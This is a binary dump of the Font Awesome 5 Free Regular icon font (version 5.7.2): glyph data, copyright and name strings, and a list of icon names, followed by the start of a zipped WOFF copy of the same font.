 ��r��
Z+10:�A
+:����+2"&4264&"%//&?'&?676�Α�Α��uu�u.>>	>>	>>	>>	��Α���u�uu��>>	>>	>>	>>����2"&4$"264/&?676�Α�ΑK�uu�u<		�	[			;�	��Α��au�uu�
	�		[	=�	����8@2"&4264&"%+"&=4>7>54&#"/&7632"&462�Α�Α��uu�u3.
				%@&?A""��Α���u�uu�� 		
64�""@�#/2"&54732654'6#".'&47>2267." /AA]A
!-*�[<oV*����J%%�%J[0A]AA.!
aPa-O5Paa�MCCMMC,A#������3F#"'&54?632632#"&'7"'632'67.27#"&'&4767z
��
-AY-Ap/54<oV&%J/54[�*&%��?-r?-�$-O5)"!CM��$aP)"!CM����#/;Ggo7#"=4;27+"=4;2+"=4;2+"=4;2+"=4;2+"=4;27#!"&546;54;2354;232!3!2�((`((`((`((`((�((`��0(�(00��T�(((((�(((((��`4444��*�������&2#"'#"&7>7&54264&"6?�Ԗ�j/.AJ
5Vzz�z(
&�z�z.%8FV�^�^^B3*

�2#!"&546;25#"/#��`�
	7��
	7�@� 	7���	7��H�"&%2#!"&546;32%763!54+'#"7!P�p�@��P?�@��P��M�1� @0j�h*@���/DT%"&=46;2+"&=46;2#3"&=46;2#2#!"&546;27"&=46;2#��J�		�0
		=`������0		
P		��0FF����E�#6M%#"'#"&'&'#"&767&54632%3264&"67654&'32?&/
A<@g;B
,zV@hKe�KA__�_x@1/R21R>
'6,'#+7B^6,	Y<71B\BB.# /#$;(E,2 �� �%&?'&6?63 � j�A	>�d?7D	�g&�D~b������#AQ&.7>&>6766&&7>2>7>&6&.7>76�*

'>D88(%6*

'>D88(%5
,36<FD 
,*(32;" �
	)`

t7�*6%(88D>&
*6%(88D>&
i+
 DF<63+
	!"F<63
`)	

7t��@� ,82#!"&5463"!54#2=!37+"=4;2+"=4;2

� �� �HH����

��`0**����d((((@�%-%#!"&=4?>3!2!'5!$"&462"&4627	� 	i

��N�Ni� �M����		pp��M���2U]2++"&++"&=46;2327167>322654&+4654#";2'>'>'4&"2�"1
$5."S
	
@

@
			*2V�,
 **=
	
�61"

"(3(�$/$v,#$�= 
&
����2V^546;&546321;6;2+"'#"+"&'&7&'#"&7;;2675&'&'.#"#""2641"V2*			
@	
@
	
S".5$"10[
	
=L 
,�
	��"1$/$�(3("
1"
&
 =&�$#,

�����3U]46326+"&=4754'1&'.5463274&#""&#"3>=4.."264j1"'
"(3(
�
/$v,#$�&= 
&
�m"1'$5."S
	
@		
@
			

*2V�,
 L=
	
�����1S["&=#"&54>76716=&=46;2''26=6767=4&'#3263264&"�"1$/
�(3("
1"
&
 =&�$#,�@1"V2*


			
@

@
	
S".5$"10[
	
=L 
,������*9B++"&546;546;22=#"&=#"3%2=#"&=#"354/&+�P�P�t`JTX
j�0
~��0@0�>*���`�
X��
0@����+3;#!"&5463!2#3254/+"&=#"362"&4264&"���N��zN
�
*�H44H4G"">��`"P��Nd

h���4H44HL""����2#!"&5463254#!"3���Z�����`�pT��� 22#!"&5463!32>567!5".'&'��`��`#dd#�`�#FF#��� 0)N		N��7

7��`�B2#""&54653+"/&2#4767654&#"#.'&546�		&		8(�	N	PIg,0+ K54L +0,ep		&		(8��++%%�gIB25=1$05KJ60$1=%
2BGi������%39%#!".54767>54675462!&5414&"0"&53�	��		H8%:!��8,B\B�4&�V

	
C,:V

,B&,C;d.BB.d�%����#/Ka}754;2+"3"=4;2#+"=4;2"=4;2#!54;46;546;23232%354;23#+"&=#7#54+"#";;2=32=4�((�(t((L(��@
X
p
X
��p(p@
p
@��((((T(4((|$${	(

(	��CC_

0����+7%++"=#"=4;54;2327#!"&5463!24#!"3!2`X XX X`��`0��T� XX XX���`��T������2"&4264&"�Α�Α��uu�u��Α���u�uu�����/2"&4264&"6"&462"&462>"'&>2�Α�Α��uu�u��/�/!f��Α���u�uu�c\
99
'����02"&4264&"6"&46262"&42&'&".7�Α�Α��uu�u�so~)R��Α���u�uu�c-m1
����+2"&4264&"6"&46262"&42+"&463�Α�Α��uu�u�s(

�

��Α���u�uu�c-}@�'3?KWco{����2#!"&54634#!"3!2%+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2%+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2+"=4;2� �� ���```�����````b����� �� ���n������'2#!"&546;54;2354;225!3���0(�(*�����`4444�p*������%.=46"&462264&"t�	4�Α���u�uu��e
	�Α�Α��uu�u����'7"=4;2#7#!"&5463!24#!"3!2l�l��`0��T�  ��`��T������#2#!"&5463!%/&?676���`��<�	[			;�		���`�p`���		[	=�			��A�2Y&='.54767675467'".>7676#!"&546;2+"3!2=42�;1+6(-$50I;"��!0<*&>))
���VT"(� 6  )K-;(!9 ����h)A'%
�+`	
��	����
%6&?6764&"2"&4264&"\B�B9ZΑ�Α��uu�u>�B�\�Α���u�uu�����
&732/&6%#!"&5463!24#!"3!2}�ccK��`0��T�cc���`��T������
&%#"&?67#!"&5463!24#!"3!2C�ccu��`0��T�cc�`��T������
&7546&#!"&5463!24#!"3!2�cc��`0��T]�cc��`��T������#!"&546;2'!#"&=#r���.L� h
�^���rLL�� 
h����),5%+"=4;22+"=43%#!"&546;2'3#"&=# ������T�Lh
��T����T<L�� 
h�`����.T\%#*#".#+"&=46;>7>3232>'2654&+4654.#+2;2'>4&"2�3&-E/@

c
-3	$(Kh	
m&%@

���!$*

�
 #	:/45'N)
9

G%�&B"U����.6[%+#".'.'#+"&=46;232>3:32264&"2>54&#6&'6&'6+"#322>54&5�2$$	3-0

@

@	.G-88�]b



@%&m"(�"454/:?	
�
3,$h	
)"B&�#6G

9���(8@H%/"/&?'&4?'&6762767'7''77&2"&4264&"�<G(
+(G<<G(,(G5MM[44[MM[44[�V==V=Q.!!.!�+)G<<F)+)G<<G54[MM[44\MM�=V==Vc!.!!.����&"&463276"3267&5467&j��j	%a>!"$h;VzzV0UT�2*@�Ԗ#(
>$?P9-2�z�z)$mU2T����
&/&?67#!"&5463!24#!"3!2cc���`0��T#�ccE��`��T������"264$2"&42"&4S�uu�u��Α�Α�B//B/�u�uu���Α��/B//B����#/;GYe54;2+"3"=4;2#"=4;2#3"=4;2#+"=4;2"=4;2#!54;463!232%354;23%�((�(�(X(t((L(��@
P
��p(p��,((((`((((T(4((|$$�

�HCC�����7=DJQ#!"&546;2'!#"&=##"''&76767&766>77"6467&'6&7r���.L� h
��

6'.
$
3�N-

x^���rLL�� 
h��D
.0*[�"�
#����R#!"&546;2'!#"&=#32+"'&/+"'.'&6;2476;21676r���.L� h
��


	


	
^���rLL�� 
h�&b		+	H		78	
`b		aa
����B#!"&546;2'!#"&=#2+"'&'+"&?'&6;26763r���.L� h
��#...		^���rLL�� 
h�=N7NN($����6>#!"&546;2'!#"&=#54;2*#+"73264&+r���.L� h
�HE#	
0

^���rLL�� 
h���%
/c����(0#!"&546;2'!#"&=#57676&2"&4r���.L� h
� ((X�((^���rLL�� 
h��@((X��((
����!$1@LP3#7#53#3#57#!"&546;23#"&=##5#7#"&?53322654."7#5�  @    @ ����Lh
0 P�
 
-		@   �      ���&L�� 
h�`�W'a  �

�  ����/=#!"&546;2'!#"&=#/#"&=46;7664'&>.r���.L� h
��$$)
	^���rLL�� 
h��$8$Y

:����7#!"&546;2'!#"&=#6/+"&=46;2r���.L� h
��5hh^���rLL�� 
h�p4%h%����$'0<M7#"/&?67#!"&546;23#"&=#7/&?6&?6/5&?�99!����Lh
��	7		7!99!c66����&L�� 
h�`�	�		�O66����$+"&46227''64&"264''&"67&7gΑ�Α��/p/522�/B//B�5/p/522�58�Α��D5UB//B//p/522�5/p/522�����!6#"/&='.77'76�2<
	p+) r�%%�;�`l���!�|.;T0<�2$��-�	����� '.5#"&'&676326767'7&'7'757/?'#� ^a&'O� ^a&'4_H:'G,4%=/@G�<&
G@]+G'%e:@,O+
b� ^Mb� *N�
*/%L=�4J/}45/J��>J%?4I0==	@�+/;GS_2#!"&546;>32=#!7"=4;2#'3554;2+"754;2+"=4;2+"54;2+"(

�!
+@�`=�lPx���hhhhhh�
��
!
���� ��x``P((��<������8@'&?63!"&54767>57"'675462'&5414&"&53z


��


��>��				.	|"&&%:!;B.&�


�


��0

	
*#D�

,B&7&/.B�`%����42"&4264&"#"&54>32'&#"3276�Α�Α��uu�u3)?=O$@(;&!$*$$
��Α���u�uu�)Q<'@%#	%"2�3K2#!"&5463254#!"37&546'&76&546'&76��`��l�R@AR@=�R@AR@>��� ����V6/.4"%6/.4"%	���+/37;Ocgo#32+"=!+"=4;#"=4;2!54;2'35!355#!5#'#"=!+32!543'2+"=#"=4;2'355#+�H��HH@H@ �@  � ��@�T���`8L@�HHHH@    ��    @���4�4pp�pL
��@�CGKOSgk���%#32+"=#+"=4;5#+"=4;5#"=4;2354;2+354;2'35355#5#354;5#"=#+325#%5#"=#32+"=#3235435#5#4H�HXHH�HXH�   ��   @��� 8XHX�4   �HHH�HHH�  �       ����  @�XH@    ����%#!"&5463!27#!3546;�T��`�LLP���
hdT`��L��h
���(42+#!"&546;54632=#"&=#"3%254#!"3�0��0��*������0@0�0*���`4������%+132#!"=4;467.5#"=43!2#!2654&"p2//2��2//2h��KjKKjK�?ss??ss?LllL�`LllL���)p6+"&5<&4&/&=46>62654&+"&=4&+"&=4&+"&=4&#"/&=4&354?6�$C	+
�
b'8#I$@:H							a�+q,(rd	!

U"49#,)(
�r

		

		(
)		

t	)

9U
d������Y6+"/&676546>654&+"&=4&+"&=4&+"&=4&/.376u.�
w!3 P4			

	
s�O)��
�7~!($%)!ф


L		�
�		�
�		�
�	&	�w��� ]"&7.7#"&463'.>6#'32?6=4/&#"/&+";2+";2#""(
X++^O8�+1b"wFFw	b
�
�
	��		

		

 6 
#+<+	88857'�%0�7@	;

			��@�A%#5'&+"&546;7#"&=463!254/&#!";2+";2-�d�!4$r�!/!&'v�
��
�	r�

c�$|H&!$40/!!!��L�
@	'�����(i7.7>'&67>767>2+"'&376=4?6&+"&?6."+"/.+"/./&5' /0 )  
�
	[|�

&

*


-*
#5B8�2"�i3 �%k

	�u`	
%�q������E2������^p��6+"/&676546266&;2?6=4&+"&=4&+".=4&+"&=4&'546;2+"&7546;2+"&754;2+"f!9%�"m!'7'!-��m	�			DL		K
(#Tw�7�''J
w

�wT

	

	#

#	�

�	R`		`	`		`		``������#^6+"/&7'&676'462654&+"&=4&+"&=4&+"/.;2?6j(%�'758%	+<+#0			

;@7�#Fw"b1+�8O^++X�F

		

		��	
��
b	w����,52"&4264&"+"/#+"&=46;2'254.+�Α�Α��uu�u6+0 'Of(: ��Α���u�uu�#ZT�U3)!

@����;C%++"=#"=4;54;2327#!"&546;54;2354;232!3!2PLLLLp��0(�(00��T�LLLL���`4444��*������+37"=4;2#7#!"&546;54;2354;232!3!2|�|��0(�(00��Tx��`4444��*������;C%//&?'&?6767#!"&546;54;2354;232!3!28	66	66	66	66���0(�(00��TI66	66	66	66���`4444��*������'72#!"&546;54;2354;225!3%/&?676���0(�(*���	K			,o		���`4444�p*��Ɏ	K	-n			��@�!%*/2#"/#"&54>?6327673#0

�



��

�



����������	��
5=?	Z
5=?:��.��/,�!/�����*2+#"=#"&54634&#!";?326�&&�}`&&�	��		�C
�	�&��&^T& &�� 		��	<2
	����/2"&4264&"%+"&=46;2+"&=46;2�Α�Α��uu�u(	0		0	p	0		0	��Α���u�uu���		�		�		�		����"&462264&"+"&=46;2��Α���u�uu��	�		�	'Α�Α��uu�ux�		�		����#+Lfn3#"&5#'#"'&/#+376;2264&"6/&'&6?#"##36???5#'&+"6?6264&"y@
:#;U			@v0��Q			�l	-	'9>*a!
%		�-=TA7
gn			@�

 	L		0��

		
W	;#>�X

 
$I�><3
S0

		
���5`#!"&54767>254'&'"."#3!2'#".'&'&?6232>7676��`(_dQ4/V� 
7
7
	7

7	��!K
	O���B)
	%F��
-

-
	,


,	����'+3H#32+32+#!"&5463!232!6"&462"&=463232632#���@P���4&&4&�	
''
	 @(@(0�0(����`�&4&&4�""��@�0<HT2#!"&5463!6"&462"&=463232632#7"=4;2#'"=4;2#'"=4;2#� � �4&&4&�	
''
	>ppppp���`�p`���&4&&4�""@@@����"42"&4264&"&2"&427&'#"'%654&"6322632�P88P8L((7Α�Α��8.-%%u�u%)@%$%@X8P88PX((ԑΑ���0&

'$4@SuuS@44

����'<2#!"&5463!"&46;2#"&462"&=463232632#P�� ��`		`		4&&4&�	
''
	��`��0��``				�&4&&4�""��@�$0<HP2#!"&5463!3&54632326327"=4;2#'"=4;2#'"=4;2#"&462� � !''9ppppp�4&&4&���`�p ��""P@@`&4&&4���2#!"&54635!3!2��`��`����`�v���� !"&463!2�@

�
 ���&2+#!"&546;54635!%!32�0��0��������0@0�0��`@0��������%/&//+"&=/&4?5/.?&/&?'.?>7'&/&6?'&?6'&6?65'&?6546;276?>76/76�'	H;		:H	'
'"PHHP"''	H:		:H	(
'"PHHP"]"Q*T;.		.<T*Q#	**	"Q*T;.		.<T*Q#	**	����08<H%"=4;2#2+#!"&5#"&=46;7>;2'3'&+"!7"=4;2#�		��		R"d"��^��L ��P		��P		9	9�`P��0����@�$4<G%#!"&546;#"3!2=!"3!2=452#!"&5463"&4627676!���
tZ��t��x""1((hH�� 0�
P��0�_""�((hHP����12#!"&546;462&"2644++"=#"3!2P��P&4&6x*�*���`&&�lT$$������"2"&4264&"74;232/&6;�Α�Α��uu�u�(CddC��Α���u�uu��tdd����"6462"$4&"27+/&?632�Α��/u�uu�-tddtYΑ�Α��uu�u�(CddC����""&462264&"54;546&=#"��Α���u�uu�-tddt'Α�Α��uu�u�(CddC����""&462"264#"=#"&?6+gΑ�Α��uu�u�(CddC8�Α��/u�uu��tddt����C�!$2"'&?63#3%3'#37'377#�d����dM94D��4�4�?D4dxD3aax4����U�0``````�������%5E2"&454+54+"327#";22#!"&54635"&5!#2!46P88P8�@�

��

0%�`%%�%0B\BB\fX
7
��

@
��%%�%%���72#!"&54634#!"3!2'//&?'&?676��`��l�l==			==			==			==		���`�vT���==			==			==			==		�����+>62"&462"&462"&4&2#"'#"&7>7&54264&"6?����Ԗ�j/.AJ
5Vzz�z(
&��z�z.%8FV�^�^^B3*

����'92"&4264&"$"'&>276&"&46272/&"&7>�Α�Α��uu�u6/�/!f!��%
&	��Α���u�uu�$
99
''A)				
���� 3H2"&4264&"62&'&".?"&547'.>6"&5"'&>?6�Α�Α��uu�u�j">'	

P	
�
	P
��Α���u�uu�)
q

	

@	

	����+GO2"&4264&"6"/"&4?'&4627626"/"&4?'&462762"&4�Α�Α��uu�u���4&&4&��Α���u�uu�kL�&4&&4	����'/7?K2"&4264&"$2"&4264&"62"&4&"&462264&"62"&42+"&463�Α�Α��uu�uB//B/<((&X/B//B5((&�

�

��Α���u�uu��/B//BQ((,B//B/�((,�����-2"&4264&"6"&46:"&42'&"&76�Α�Α��uu�u��N<=
	141	
��Α���u�uu��]"		
����/6=AEIMT[2"&4264&"6"&462"&4622+"&=4635#375#"5#75#5#75#5#326=4&+�Α�Α��uu�u���(		h000p000h(		��Α���u�uu�c#  `	(	((((		����'/2"&4264&"%6#".'&62&"&462"&462�Α�Α��uu�u2M)6()�����Α���u�uu�"
".&

N����
#+97"'&'6762"'&'6762&2"&4264&"%6"&'&62�q�Α�Α��uu�u2MRM)��		""		""		""		""ڑΑ���u�uu�"
".."

����4E2"&4264&"%6#".'&62'&7>32/&"7&7>2/&"�Α�Α��uu�u2M)6()��#
	
&
	�#&#
	
&
	��Α���u�uu�"
".&

V)))����
+EZ"&5476".'&62766/&"'&7>27"&4632&#"2654'2$"'&7>32/�,..�6')�)M`
	
&
	#&#d�Α�gC:2:Suu�u��&
	#
	 "EE��%


".�)),%(g��Α" u�uuS!)����
4<D%6"&'&62/.7>7>7/&67676&2"&4264&"bMRM)�pF�F	
�Α�Α��uu�u�
".."

>
FDF	
��Α���u�uu�����,:2"&4264&"%6#".'&62.?'&63'&4?6�Α�Α��uu�u2M)6()��
!!PP�PP	!!
��Α���u�uu�"
".&

/((0000((�����/;JYh76"&4767&67632&#"%67#"'67327>'&76762+&/.?"'&?6367>'&676u/")7Hg<5/6S:.{$9Ig30)-S:1C/"��
	
4

Z4	

4

&.:T&@R"/6D�6I;-�E�9I;0�TR"/s
Z	
4Z	
4p/%T:����6P2"&4264&"%6"&'&62'7'&6?62/&%/&?'&6?62�Α�Α��uu�u2MRM)��#
##
��Α���u�uu�"
".."

G#		#N	##	������%5CTi76"&476"'&'&6"&'6726%&>2&.""&'&62766/&"'&7>2&"'&7>32/u/"M"/Rl#l~l#_r_��'Em~mE&p�p�RM)�)
	
&
	#&#�&
	#
	�R"//"RP 2;;2 1;;�>f;;f?	H``�."


"|))")����;CK2"&45'&"/.32>>54&"&=&'&6276&2"&462"&4�Α�Α8%1;u�u;1)�)����Α��,		+'_9SuuS9_,


,�����;HU2"&45'&"/.32>>54&"&=&'&6276/&4?&?'&6�Α�Α8%1;u�u;1)�)!!
	PP�P	
!!��Α��,		+'_9SuuS9_,


,((0000((����!)1Ge2/&"&7>2"&4264&"62"&4&2"&45'&"/.32>>54&"&=&'&6276�

&
%�B//B/<((&�Α�Α8%1;u�u;1)�)
					4/B//BQ((,��Α��,		+'_9SuuS9_,


,����%-52/&"&76"&4626"&'&622"&4264&"4(%
&
Z�MRM)��Α�Α��uu�u						$T
".."

6�Α���u�uu�����)19A2"&4#"'&?64/&4?64/&762"&4264&"$2"&4��##)�Α�Α��uu�uq				%�Α���u�uu������#EU2/&"&7>&2"&4264&"%#"'&?64/&4?64/&7662/&"&76�#
&
	
Α�Α��uu�u##)&#
&
	
()��Α���u�uu�				�)����!4<Ol%#"'&?64/&4?64/&7637&"&7>32'&462"/&>7676#"&4632&#&'654&"320##)F&

%�ZS
�/4g��gg�
u�uuS-�					L

		�!	S	1(�Α�g.,
 Suu�u����-2"&464&"6"&462"&4622+"&'&63�Α�ΑKuu�uu���E..E��Α���u�uu�u�S	-<<-	����/=2"&464&"2/&"&76&7>2/&"2+"&'&63�Α�ΑKuu�uu�&#
&
	
�
#&#	
&
�E..E��Α���u�uu�u0)#))M	-<<-	����)72"&464&"/&4?6&?'&62+"&'&63�Α�ΑKuu�uu�!PP�	
!!P�E..E��Α���u�uu�u(00b((0R	-<<-	����!)72"&464&"2/&"&7>"&4622+"&'&63�Α�ΑKuu�uu�
&	l�E..E��Α���u�uu�u$
				2S	-<<-	����2"&4264&"62"&462"&4�Α�Α��uu�uk���Α���u�uu������)1CO2"&4264&"$2"&42654'"&547&"&4622654'"&5472+"&463�Α�Α��uu�u<**<*7"@*<**<F"�

�

��Α���u�uu��*<**<F

/<**<*H

�����!3CK2"&4654&"5462275462&/&"&7>3262/&"&762"&4�Α�Α�8u�u8-f-�	&

%p(%
&
>.!!.!��Α���:PSuuSP:r

��

2						
*				D&4&&4����&.92"&4264&"72&'&#"&46&"&46262"&46"&54�Α�Α��uu�u�<&&
As�$"��Α���u�uu�#.@-P1����4E2"&4264&"%>"'&>2''&7>32/&"62/&"'&76�Α�Α��uu�u/�/!f�	#
	
&�&#
	
&
	��Α���u�uu�
99
'�)%)����'2"&4264&"62"&46"&46:"&4�Α�Α��uu�u�4&&4&���Α���u�uu�;&4&&4{����)82"&4264&"$/&4?&?'&62'&".76�Α�Α��uu�uC
!!
	PP�P	
!!PHC
#r#��Α���u�uu��((0030((0J6'	
'V6��![%�
,��+O���	4	6Q	�	B�	6#	Jw	0�	
X4	.�	&	?	6W	&�	�Copyright (c) Font AwesomeCopyright (c) Font AwesomeFont Awesome 5 Free RegularFont Awesome 5 Free RegularRegularRegularFont Awesome 5 Free Regular-5.7.2Font Awesome 5 Free Regular-5.7.2Font Awesome 5 Free RegularFont Awesome 5 Free Regular329.474 (Font Awesome version: 5.7.2)329.474 (Font Awesome version: 5.7.2)FontAwesome5Free-RegularFontAwesome5Free-RegularThe web's most popular icon set and toolkit.The web's most popular icon set and toolkit.https://fontawesome.comhttps://fontawesome.comFont Awesome 5 FreeFont Awesome 5 FreeRegularRegularFont Awesome 5 Free RegularFont Awesome 5 Free RegularFont Awesome 5 FreeFont Awesome 5 FreeRegularRegular���	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJ�KLMNOPQRSTUVW�XYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~�����������������������heartstaruserclocklist-altflagbookmarkimageedittimes-circlecheck-circlequestion-circleeye	eye-slashcalendar-altcommentfolderfolder-open	chart-barcomments	star-halflemoncredit-cardhddhand-point-righthand-point-left
hand-point-uphand-point-downcopysavesquareenvelope	lightbulbbellhospitalplus-squarecirclesmilefrownmehkeyboardcalendarplay-circleminus-squarecheck-squareshare-squarecompasscaret-square-downcaret-square-upcaret-square-rightfilefile-alt	thumbs-upthumbs-downsunmooncaret-square-left
dot-circlebuildingfile-pdf	file-word
file-excelfile-powerpoint
file-imagefile-archive
file-audio
file-video	file-code	life-ringpaper-planefutbol	newspaper
bell-slashclosed-captioningobject-groupobject-ungroupsticky-noteclone	hourglass	hand-rock
hand-paper
hand-scissorshand-lizard
hand-spockhand-pointer
hand-peace
calendar-pluscalendar-minuscalendar-timescalendar-checkmapcomment-altpause-circlestop-circle	handshake
envelope-openaddress-bookaddress-carduser-circleid-badgeid-cardwindow-maximizewindow-minimizewindow-restore	snowflake	trash-altimages	clipboardarrow-alt-circle-downarrow-alt-circle-leftarrow-alt-circle-rightarrow-alt-circle-upgemmoney-bill-altwindow-closecomment-dots
smile-winkangrydizzyflushed
frown-opengrimacegringrin-alt	grin-beamgrin-beam-sweatgrin-heartsgrin-squintgrin-squint-tears
grin-stars
grin-tearsgrin-tonguegrin-tongue-squintgrin-tongue-wink	grin-winkkiss	kiss-beamkiss-wink-heartlaugh
laugh-beamlaugh-squint
laugh-wink	meh-blankmeh-rolling-eyessad-crysad-tear
smile-beamsurprisetired����`)l؈��؈��PK!J�h�A�A(fontawesome/webfonts/fa-regular-400.woffnu&1i�wOFFA�
�,IyXFFTM0�qqGDEFL*�OS/2lO`A��cmap���Ǡ��gasp���glyf�5Fn�lhead8�36��hhea9$5�hmtx9<�T_tloca9�66�Eˈmaxp;, ��name;LU.05�post=`I��OA�x�c```d�	�9`�c�U(}G.��x�c`a|�8�����ч1����Je�dha``b`ef�FHsMah������0�4ՀZ1.R
����x����K�q��>n
ϳ3c��)<HP]:u0�
��ݶ�C�0*��Ƞ�����,a�.i�A!T*�^$,(|��pf��I��Ak��f�/��scL���
�q�)4��Ng���䚕���x	��B^�비�(W�q>ɵ\�|��q7s+?�>��_����\
d���F�*�d���R/W�M�奼�Q��i�QW�h�F���И^��X��S��}���E~ԏ���d[r�6f/��6n�m��}�1β��XOͳ���y֥XKe�D吜��ڝe�Xw�cZ3k�e�ց�u_��ƞ�7l�}��JiJ������Kt���5�M�N
t��Q-Ũ��S�:ZC���S>�����8�#8���؀�1�UX��w���0��L��[x�>$�nA#��#��E"�H��ܻ�z��7�N�S��r�~��P�ɀCN0�샿���~3S��x��}	�$Gu`FyUVeUVfuuuu��wW��3}Lϩ��jiZ��nI�F	!�VԆA�A�����l�V��Y�1�l��ˀ�~<֞����X�,T�Ȭ����a��33"##����_�#��?�;����\��P� ™i4�ꍺ�,"�^-��8�����@_����M�~oЎ������%�%��ıdn� ���k�&���O[�)ccʥ�k21<���X�5��E��8�n��Ϡ/p1.��D����]�]�X�����a�1M�I��C�n�5 ��w��L	w���neD�MN�wq񽧜�B_0N?q�}��X��F��φ�g?z���wX��w�޽q�\�;ƕ9._������LaU땲]�;�j!���=�z�P��m���ܭ���c	��n%�5�j��JVؑL����?���ʝ˳�˳�5�V"a��B��x�
U��+�ɇfiN���+����0Dž�5^����IE
�*}`�>���������_+�)}�B�}�qz�����[�E�����DԸ
��d��ϡux� W�*�.�
���}َ�.�5�Ge8A	*+��5�2.�-�1����9��(��UzDOcܼct�����Y4�u���<�<��
<��1��1}�wT������`��/r#�,�F���I���B�Zw�ȱ�����Z�R���'v��텽���]
	%���q�/��O?�.yGr�d�0=�3	59n����E!�I#M 3A&���r*��^,�րU�B��E�H������ŋ�
7���!�l�Μ�$m���5޳By�v��ؘf���Dz52N�QF�/�o�vd'��#�<�,�Dk��k���_�0U(L�8��(��-s���wÜN�̚�0�\�wJ�)�#3]�6�Ɏ`�#�"� jD���:z"%�m&K�����7r���UD�Rxܼo�d������ar:%���ר�Ds�^�͟�|º�0�͙��v����3��7Ͽ<aӎ
�i�D�.��S�������'���=9���+�!�R&�<�C\�Z�8.�d^Q�S���{��x�Օ��ۊr{��d���Yn�,��cH'
�E��(0�h�4i���]$��	�HS�ê.ˊ0�L]!JB���®����L7q�㤌��%B$E�BK𸤇��)$J�z���F'�K��&p�4�~
p��z�Z�K�W�f�`ܪ�Eh@���`��Qjz��v��I� ����n�����S?���|����cW݀J�p�T(HҎ�nY�|��;�/G��=rd���,'ml��%�_`�*����#���V);���dR��!E(�(p1\�B�ᰛw.I�bQe,��Y�I�>�����Oת.��p!�?|��ᩱv�#Eux����]����y����f���G������N�!���8�Q|t�i���fZZ�jtTC��]�-��m>�5�jn��ֹlf$Y�|~D�G�U}��E��"%(��_�J���T���-t�;��Qߵ��NGUu�J��'�X�1�o�?O�F��7o`��5`��PK�����Z��䷞|���W�t�:���>�܃#�*��A�)�u(SCo�óN�ߛ��|�ʘ���� �+�[�?��r�_���Q��{.k���J����ZJXm��4�/_��%oN�~�`�uDY�ݱS���GaփG�l5҄%�ec�y����Tk.�2Q���#�[n��ȥ�ؚ��^�����極5N��a�}�
�۵��<�<�.g+=eg@6z��I�,������W�C�w��0}�Ю_���gv�R��w(��Zf�_,��z���d?�I��sG�$���*ł�1u�0L($Q��;T����!�D+A��܅�����4�-ѐ�w�'�K�cAcnOPW��ă'��zm��}�-�%��E$�f��5�kb��E1�h��(��/��o칹>�\7ߘ�����R�cz(���d~d��TƢf@%�5�6=J1���>K��V<J�Mw����z,u!z6��� �7~��9^D���]
='Hq�L��TX�6�)N�7
�h�
���"��W��ƠOMAt$��1- ���Ύ�e�����N�f�>`_J�H�Rpl�R����:�*��
�`~�א�g�궜��ݷX�D�ڦ�ׅ�U
a!��|�bBI1I'2�h��:��|@n�G`*1;}	x%�Q��p-X`	�Y�d�̾�Y^@�Ui��q�w͇v�~�NJ��/�������H�ݣ:Z�6)W�cc���S>Aȹ�y�6
�m��s�0�~�iZD��-�.Fj�h�3Z��P\p��aGE����E�}]�&�D�G��[z�W(H��M�ue��*'��{ޏ�*O���k��\���q��
CO��8�
^��:�/ڒ8�H�&U8���M�в���W]��Nf&�$��Eզ��㪠��A����㡱2ˆF�N�jHҬԠ96�.��"H��a���33�t534R�M��tS�E����s����aDɄ�5�尝/�Vx������ځ�ډ�Op7s\�"�J*a�{Q��-�
�5#G��(�б����v�F���)>��ZvH‹��9�9���Bq=,*fT��M�\����T
Y"�s��RԸ�VVtu!;l
�,M
����I@��i���gf4=7�����0�Pc(��3#��Y(�Ĝ��ͬ5A$5�#���k�T��0�����Q��N./4�(�EF$�Qu�{�E-j��E-��?�����]�[�%do�H܌��G��5`�����@���8(���>,d��pׅ�w�����#U&��
e�����\_6[	.b����(�A3`	:$Jd�e�����R#f���r��rc� u��@4���Ӛ8��u���8�/�3~�n�|���ol� $��2Y7��]�Ԫ����y#a-{F�����0ī05O��]�/��|�ð�?Q�d��0��x�ͯ�U�C=I����Ȓ'��u�U��gV�v������F+�O�Pi����m�+c�zb[���kkb���^P�1�9X��^�\y����w#��|#�珞R
C��V^����K��'\X��m�eL�c���,H����x��k�h䭷g)�+�Wʋ|
�t
�Q�L	 ��B���쩄N�c$Ne��h={�0���1��v�-J���ȡz�AG��B��l5HHH��F�3�V����ـ�"�5��(�B�œ8���1��;���¨E�G4;���%/��Yb�rT�b��'�aR�#�C����x�/IK�x-:mq���l���㒘'$/��N_���9�,��J�CW�K��??���\�:
?�;��<�������S0
D h�;
�
�$�
;)
p�0#���X����\S�����i�U�ߙ�� �|?��S�=���	U9(�*���;OhQ:�A�)L�2w
M�وN�y~��#���Cܭ��{�<j�T:�d��K��;�4}�7�m�F�J9��lg
5��W�)�L.h��@�k����t�s�Y��L-����Q
���<wn�Yb5K/���c잾�3�Vع���t�6E��mDW��F{u}/�%F+b�v���u6�AR�(5�<��s��.q�[���ܚ��2Z�O�)��N���Yr'�
~��B?y�ӂ:��ԅi�m�u�}��9�M�"z�{�a�ݦZ!v�;�EV?�`�;v�q�����c[AO���|���;��~{�c0�(����A�/��U�����e�:`'e\�b3`of�7�c�D�q�&�`��$;�3C@)���0��[��d/l=S�V�
,Ƅ�akx�n�mL�m�w�
q��n��Ƚ��e�܇���#|\��"ֳյ��/��V�'>�4	���fJ��%��������Լ�њW^ۦ�w�M�~��s�k^�ߣ��zo�]?�E������V,ȓ��0B�c�)�F�t��nEǘ��@�������|�i����5T3NQ���'z�#�O�/(!-�����A䵢P^2b���'�4�s\�'���ww�t��R�7A���ś�A.��G��<�E݇��e��6��|W��VzM!�臝�c
��l~7�3�e���څ����&.z:��oGh�Ccc
-J
�޳��҉����.]�z|�0�9s3�VO�L撵ҕsN�ܹti~�Y$�����4�-������(c�@��I�R��ɹ��v�bv�ϝ�S�́�O�A���s	oQ@AVy6&q��ؖs��iL�Cuq�J�o��|��C7��#i���&���El��4i�{��U(֭�:�rq�lT���J=�
���K2Ʒ���@�C}��D�K��-Xn���0��j}o��}��ֻ/��wSނS��m�}��3
�}�M>�n3�����`�{� �.F���i�^�%B�jS�_B�;Uc�n�']wܚ{���;�Ujg�r\ͳ�<9B<[J�|��"�`ޫM�ҟ����d�X;,R@^d�x�˟�b̷`j����sS�
w#��4N�g��
